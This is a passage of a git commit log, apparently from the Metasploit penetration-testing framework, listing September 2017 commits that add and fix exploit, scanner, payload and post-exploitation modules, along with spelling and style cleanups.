The bind shell is the companion payload to the reverse_shell_jcl
payload for the mainframe platform.
2017-09-29 16:52:36 -05:00
William Vu 9b75ef7c36
Land #8343, qmail Shellshock module 2017-09-29 00:28:30 -05:00
William Vu daedf0d904 Clean up module 2017-09-29 00:27:22 -05:00
h00die 6cc5324e5b oe is all umlaut 2017-09-28 19:52:02 -04:00
Martin Pizala 3a1a437ac7
Rubocop Stlye 2017-09-28 23:53:45 +02:00
Martin Pizala 40c58e3017 Function for selecting the target host 2017-09-28 23:43:59 +02:00
Martin Pizala cc98e80002
Change arch to ARCH_X64 2017-09-28 20:50:18 +02:00
h00die 2295146dcd working optionsbleed module 2017-09-27 22:07:57 -04:00
h00die 997b831b52 implement regexes 2017-09-27 19:33:50 -04:00
Christian Mehlmauer 41e3895424
remove checks for hardcoded name 2017-09-27 07:41:06 +02:00
h00die 0649d0d356 wip optionsbleed 2017-09-26 22:09:07 -04:00
bwatters-r7 579342c4f6
Land #8955, Fix error messages on telnet_encrypt_overflow.rb 2017-09-26 16:08:58 -05:00
bwatters-r7 66d6ac418a
Land #8978, Add smb1 scanner 2017-09-26 16:06:41 -05:00
Brent Cook cad36ee14e
Land #8952, suhosin compatibility added to staged payload 2017-09-26 15:22:36 -05:00
William Vu b10d6b8b63
Land #9001, SSLVersion consolidation for modules 2017-09-25 15:53:18 -05:00
William Vu 98ae054b06
Land #8931, Node.js debugger exploit 2017-09-25 14:00:13 -05:00
Brent Cook 7924667e51 appease alignists 2017-09-25 09:10:10 -05:00
Brent Cook 62ee4ed708 update modules to use inherited SSLVersion option 2017-09-25 09:03:22 -05:00
g0tmi1k 1ee590ac07 Move over to rex-powershell and version bump
Version bump for:
- https://github.com/rapid7/rex-powershell/pull/10
- https://github.com/rapid7/rex-powershell/pull/11
2017-09-25 13:45:06 +01:00
h00die 273d49bffd
Land #8891 login scanner for Inedo BuildMaster 2017-09-24 13:30:17 -04:00
h00die 4d1e51a0ff
Land #8906 RCE for supervisor 2017-09-24 08:03:30 -04:00
Jannis Pohl 48188e999e post/windows/manage/persistence_exe: fix service creation
Fixes service creation when in post/windows/manage/persistence_exe
2017-09-23 23:48:50 +02:00
h00die 9528f279a5 cleaned up version, and docs 2017-09-23 10:51:52 -04:00
RootUp e4f79879ba Update and rename modules/auxiliary/dos/ibm_lotus_notes.rb to modules/auxiliary/dos/http/ibm_lotus_notes.rb 2017-09-23 18:27:50 +05:30
Pearce Barry e8eeb784e4
Land #8960, spelling/grammar fixes part 3 2017-09-22 18:51:31 -05:00
Pearce Barry 8de6fa79c1
Tweakz, yo. 2017-09-22 18:49:09 -05:00
Pearce Barry d56fffcadf
Land #8974, spelling/grammar fixes part 4. Finished. 2017-09-22 14:59:28 -05:00
Pearce Barry f1be6b720b
Tweaky bits. 2017-09-22 13:38:06 -05:00
RootUp 669b6771e3 Update ibm_lotus_notes.rb 2017-09-22 17:16:42 +05:30
RootUp a71edb33be Create ibm_lotus_notes.rb 2017-09-22 17:08:05 +05:30
h00die ddbff6ba3c
Land #8980 unauth RCE for denyAll WAF 2017-09-21 21:41:33 -04:00
Mehmet Ince 3d543b75f5
Fixing typos and replacing double quotes with single 2017-09-21 23:48:12 +03:00
Mehmet Ince 1031d7960a
Moving token extraction to the seperated function 2017-09-20 10:23:32 +03:00
bwatters-r7 5a62e779aa
Land #8954, fix internal usage of bindata objects when generating NTP messages 2017-09-19 09:01:49 -05:00
Mehmet Ince ee969ae8e5
Adding DenyAll RCE module 2017-09-19 14:53:37 +03:00
loftwing c953842c96 Added docs and additional dialects 2017-09-18 15:02:38 -05:00
loftwing 7d07f7054d Merge remote-tracking branch 'origin/master' into add_smb1_scanner 2017-09-18 13:16:06 -05:00
loftwing d07fe2f1e7 Added reporting back, removed wfw dialect 2017-09-18 13:15:19 -05:00
h00die 08dea910e1 pbarry-r7 comments 2017-09-17 19:38:43 -04:00
h00die c90f885938 Finished spelling issues 2017-09-17 16:00:04 -04:00
William Webb d5362333e2
Land #8958, Add Disk Pulse Enterprise web server buffer overflow 2017-09-15 13:34:22 -05:00
loftwing 6f5eb5a18f update 2017-09-15 12:07:28 -05:00
Pearce Barry e651bc1205
Land #8951, Hwbridge auto padding fix and flowcontrol 2017-09-15 08:33:17 -05:00
james 4e81a68108 Simplify saving valid credentials by calling store_valid_credential 2017-09-15 00:18:33 -05:00
loftwing e88b766276 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into add_smb1_scanner 2017-09-14 17:00:45 -05:00
loftwing 646dda7958 Add initial smbv1 scanner code 2017-09-14 16:59:39 -05:00
Christian Mehlmauer c77cb51d64
add newline 2017-09-14 18:26:11 +02:00
Jeffrey Martin a992a3c427
Land #8774, Post module for gather Docker credentials 2017-09-14 10:15:03 -05:00
Pearce Barry 200a1b400a
Remove spaces to appease msftidy. 2017-09-14 09:28:38 -05:00
h00die 30f833f684 80 pages left 2017-09-13 22:03:34 -04:00
loftwing 52385f4d9e fix formatting to fit rubocop 2017-09-13 11:46:57 -05:00
loftwing b8c40a9d95 Clean up formatting 2017-09-13 11:13:33 -05:00
loftwing 3c204f91ef Correct module title 2017-09-13 11:02:13 -05:00
loftwing 65f2ee9109 added generate_seh_record 2017-09-13 10:56:32 -05:00
loftwing 7db506887b Add exploit code 2017-09-13 10:36:36 -05:00
loftwing eb0d174987 Add disk_pulse_enterprise_get module 2017-09-13 10:19:24 -05:00
William Webb a07f7c9f42
Land #8520, Linux post module to find and collect TOR hidden service configurations 2017-09-12 13:39:18 -05:00
Erik Lenoir 27a517e0f6 Fix #8060, cf #8061 2017-09-12 18:41:51 +02:00
Brent Cook a7a17c677c fix internal usage of bindata objects when generating NTP messages 2017-09-12 09:54:09 -04:00
Anant Shrivastava 86726978ed
payload size updated 2017-09-12 19:23:31 +05:30
Craig Smith e4465c9350 Fixed a bug where flowcontrol caused the first packet to get lost 2017-09-11 19:00:53 -07:00
Craig Smith b218cc3c7f Merge branch 'master' into hw_auto_padding_fix 2017-09-11 18:30:34 -07:00
Craig Smith ad9329993d Added better padding and flowcontrol support. 2017-09-11 18:20:57 -07:00
Pearce Barry 7b87915e1f
Land #8923, Add additional error checking to mssql_clr_payload module 2017-09-11 17:39:33 -05:00
Jeffrey Martin a58552daad
Land #8825, Handle missing util.pump in nodejs shell payloads 2017-09-11 15:32:21 -05:00
Tod Beardsley 5f66b7eb1a
Land #8940, @h00die's second round of desc fixes
One ninja edit along the way as well.
2017-09-11 13:05:13 -05:00
Tod Beardsley cfbd3c1615
Fix spelling of Honeywell 2017-09-11 13:02:18 -05:00
james ba880d1a85 Changes to mssql_clr_payload error handling based on code review 2017-09-10 14:15:39 -05:00
Patrick Thomas 2966fb7c8c Accept @shawizard suggestion for formatting msg_body 2017-09-10 11:23:52 -07:00
james 861f4a6201 Changes to buildmaster_login from code review
Use peer property in messages instead of rhost rport combination for consistency.
Documentation updated accordingly.
2017-09-09 18:00:04 -05:00
james 47adfb9956 Fixes from code review to buildmaster_login
Per bcoles, the most important fixes are:
- Removing `self.class` from call to `register_options`
- Adding rescue to login_succeeded to handle bad json
2017-09-09 16:26:01 -05:00
h00die 7339658ba9 224 pages of spelling issues left 2017-09-09 09:52:08 -04:00
h00die 6289cc0b70 Merge branch 'spellin' of https://github.com/h00die/metasploit-framework into spellin 2017-09-08 22:20:39 -04:00
h00die 0910c482a9 35 pages of spelling done 2017-09-08 22:19:55 -04:00
Brent Cook 8f864c27e3
Land #8924, Add Apache Struts 2 REST Plugin XStream RCE 2017-09-08 13:59:52 -05:00
Brent Cook 54a62976f8 update versions and add quick module docs 2017-09-08 13:59:29 -05:00
William Vu 978fdb07b0 Comment out PSH target and explain why
I hope we can fix the PSH target in the future, but the Windows dropper
works today, and you can specify a custom EXE if you really want.
2017-09-08 13:41:06 -05:00
dmohanty-r7 c91ef1f092
Land #8768, Add Docker Daemon TCP exploit module 2017-09-08 12:50:00 -05:00
Pearce Barry 2ebf53b647
Minor tweaks... 2017-09-08 10:04:47 -05:00
h00die 00c593e0a2 55 pages of spelling done 2017-09-07 21:18:50 -04:00
William Vu a9a307540f Assign cmd to entire case and use encode for XML
Hat tip @acammack-r7. Forgot about that first syntax!
2017-09-07 19:36:08 -05:00
William Vu 8f1e353b6e Add Apache Struts 2 REST Plugin XStream RCE 2017-09-07 19:30:48 -05:00
Brent Cook a0181a4d54
Land #8831, Add Maven post-exploitation credential extraction module
Merge remote-tracking branch 'upstream/pr/8831' into upstream-master
2017-09-08 00:37:03 +02:00
James Barnett 7e9d0b3e9b
Fix permissions in docker priv_esc module
The previous command didn't give the original user enough permissions
to execute the payload. This was resulting in permission denied
and preventing me from getting a root shell.

Fixes #8937
2017-09-07 16:48:02 -05:00